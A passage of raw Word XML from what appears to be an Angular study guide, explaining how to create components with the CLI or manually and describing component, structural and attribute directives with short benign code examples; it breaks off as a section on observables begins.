          <w:numId w:val="3"/>
        </w:num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How to Create Components in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBFA8B6"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You can create a component in Angular using the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Angular CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B7FD18" w14:textId="77777777" w:rsidR="00001CE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B1B31A2">
          <v:rect id="_x0000_i3517" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52757DA6" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CE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Using Angular CLI (Recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006233C8"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un the following command in the terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52693767"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ng generate component component-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297F49A8"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13396EBA"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ng generate component user-profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D598DFE"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his will create:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA91A80"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src/app/user-profile/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A5014"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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>── user-profile.component.ts      // Component class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EF638"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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>── user-profile.component.html    // Template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19888BDA"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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>── user-profile.component.css     // Styles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2669E4F1"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user-profile.component.spec.ts // Unit test (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780B49D" w14:textId="77777777" w:rsidR="00001CE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4C043F">
          <v:rect id="_x0000_i3518" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9DB451" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CE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You can also use shorthand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501B53A1"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ng g c user-profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436416EA" w14:textId="77777777" w:rsidR="00001CE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84BAA0C">
          <v:rect id="_x0000_i3519" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CFD729" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CE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Manually Creating a Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E3D06"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Create a folder and component files</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF7F634" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CEE"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lastRenderedPageBreak/>
        <w:t>user-profile.component.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD1FBB" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CEE"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r-profile.component.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A6FFB5" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CEE"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r-profile.component.css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAC9421"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Define the Component</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in user-profile.component.ts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBB7382"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 Component } from '@angular/core';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4AFA92" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CEE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367BA3A8"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mponent({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40423E2C"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selector: 'app-user-profile',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857E52B"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emplateUrl: './user-profile.component.html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF6B86"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styleUrls: ['./user-profile.component.css']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CCE9C4"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6B30E83B"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UserProfileComponent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4A0C14"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name = 'John Doe';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE43CB"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633B8521"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Register the component</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the app.module.ts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F40A4"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 UserProfileComponent } from './user-profile/user-profile.component';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300FC4DF" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CEE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68006B10"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NgModule({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73182CA9"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declarations: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01764629"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UserProfileComponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316E42A0"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6DFEC2A6"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617E4D6E"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AppModule { }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456D6594" w14:textId="77777777" w:rsidR="00001CE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9C75AF0">
          <v:rect id="_x0000_i3520" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DEB8D5" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CEE"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Use the component in HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B658398" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CE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n app.component.html or any other parent component:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10762B40" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00001CEE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;app-user-profile&gt;&lt;/app-user-profile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6411A8" w14:textId="7F531587" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2221A210">
          <v:rect id="_x0000_i3521" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E8863" w14:textId="5C68AD52" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00B126AD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="866" w:name="_Toc196308346"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain angular directives</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="866"/>
    </w:p>
    <w:p w14:paraId="0AF49E82" w14:textId="0B83D50B" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Angular Directives – Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571972C"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Directives</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Angular are special instructions in the DOM (Document Object Model) that tell Angular how to render or modify elements, components, or behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C16ACB" w14:textId="77777777" w:rsidR="00291DE8"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08BA41A">
          <v:rect id="_x0000_i3522" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="042AD899" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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Types of Directives in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC419CE"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Angular provides </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>three</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> main types of directives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501EE4D4" w14:textId="77777777" w:rsidR="00291DE8"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8237EE5">
          <v:rect id="_x0000_i3523" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D6F8F" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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 Component Directives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BED92EB"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Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A component is technically a directive with a template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142A36A3"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Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every component you create with @Component is a directive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327EC908"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mponent({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F30C20"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selector: 'app-user',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2507C2"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emplateUrl: './user.component.html'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A7790B"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31DB4D20"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UserComponent {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A8BF5" w14:textId="77777777" w:rsidR="00291DE8"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4C7DE00">
          <v:rect id="_x0000_i3524" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C480CD9" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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2. Structural Directives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4321A850"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Change the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>structure</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the DOM (i.e., add/remove elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D42E9D6"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Common examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B11C2B6" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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ngIf: Conditionally includes a template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43677F48" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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ngFor: Repeats a template for each item in a list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748ACBB6" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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ngSwitch: Switch-case rendering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB60E2A" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624A1D46"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lt;div *ngIf="isLoggedIn"&gt;Welcome back!&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5051F33A" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72ECC804"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lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C23A64"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  &lt;li *ngFor="let user of users"&gt;{{ user.name }}&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646C866"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lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5482C221" w14:textId="77777777" w:rsidR="00291DE8"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29C726D">
          <v:rect id="_x0000_i3525" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="375E3F76" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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3. Attribute Directives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B552AE"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Change the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>appearance or behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0831BBA0"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Common examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F79781" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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ngClass: Add/remove CSS classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137C1A6A" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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ngStyle: Dynamically set styles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0E1360" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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ustom directives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A0C91" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A90BD1D"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lt;div [ngClass]="{'active': isActive}"&gt;Active Block&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB3E258" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FF1784"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lt;div [ngStyle]="{'color': isError ? 'red' : 'green'}"&gt;Status&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D362315" w14:textId="77777777" w:rsidR="00291DE8"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6DEA3EE">
          <v:rect id="_x0000_i3526" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ECA755" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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Custom Attribute Directive Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DC4563"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Directive({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5EDB2F"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selector: '[appHighlight]'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B42FB"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6F159E20"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HighlightDirective {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B603713"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constructor(el: ElementRef) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D9AB6"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el.nativeElement.style.backgroundColor = 'yellow';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6195048B"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2CDC2CD4"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15B07CD0"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 it like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB0E917" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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lt;p appHighlight&gt;This text will have a yellow background&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070BBD4A" w14:textId="2C570BE4" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="57AD3F02">
          <v:rect id="_x0000_i3527" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E0A57D" w14:textId="2BF75065" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="005B610E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="867" w:name="_Toc196308347"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are observables in angular</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="867"/>
    </w:p>
    <w:p w14:paraId="3EC09512" w14:textId="5F52914D" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716D" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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What Are Observables in Angular?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D23B684"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Observables</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a key part of Angular's </w:t>
      </w:r>
